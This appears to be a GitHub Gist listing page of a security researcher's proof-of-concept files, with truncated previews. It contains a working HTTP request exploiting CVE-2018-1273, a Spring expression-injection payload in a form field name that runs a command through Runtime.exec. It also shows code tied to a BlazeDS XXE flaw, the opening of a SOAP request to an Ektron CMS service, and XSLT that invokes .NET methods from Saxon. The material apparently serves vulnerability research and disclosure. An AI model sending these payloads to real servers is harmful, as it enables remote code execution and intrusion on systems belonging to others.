Matthias Kaiser matthiaskaiser

matthiaskaiser / bypass.sct

Created June 28, 2018 20:01

matthiaskaiser / CVE-2018-1273.http

Created April 12, 2018 08:35

POC for CVE-2018-1273

	POST /users HTTP/1.1
	Host: localhost:8080
	Content-Type: application/x-www-form-urlencoded
	Content-Length: 164

	username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('xterm')")]=asdf

matthiaskaiser / Amf0Input_readObjectValue.java

Last active March 14, 2019 02:23

CVE-2015-3269: Apache Flex BlazeDS XXE Vulnerabilty

	/* */ public Object readObject()
	/* */ throws ClassNotFoundException, IOException
	/* */ {
	/* 91 */ int type = in.readByte();
	/* */
	/* 93 */ Object value = readObjectValue(type);
	/* 94 */ return value;
	/* */ }
	/* */
	/* */ protected Object readObjectValue(int type) throws ClassNotFoundException, IOException

matthiaskaiser / ektron.http

Created February 25, 2015 10:03

	POST /Workarea/ServerControlWS.asmx HTTP/1.1
	Host: xxxxx
	Content-Type: text/xml; charset=utf-8
	Content-Length: 880
	SOAPAction: "http://www.ektron.com/CMS400/Webservice/ContentBlockEx"

	<?xml version="1.0" encoding="utf-8"?>
	<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
	<soap:Body>
	<ContentBlockEx xmlns="http://www.ektron.com/CMS400/Webservice">

matthiaskaiser / saxon_xslt_dotnet.xslt

Created February 25, 2015 09:58

Calling .net CLR methods from Saxon

	<xsl:transform version="2.0"
	xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
	xmlns:saxon="http://saxon.sf.net/">
	<xsl:output method="text"/>
	<xsl:template match="/">
	<xsl:text>asdf</xsl:text>
	<out xmlns:env="clitype:System.Environment" xmlns:os="clitype:System.OperatingSystem">
	<xsl:value-of select="env:Version()"/>
	</out>
	<xsl:text>asdf</xsl:text>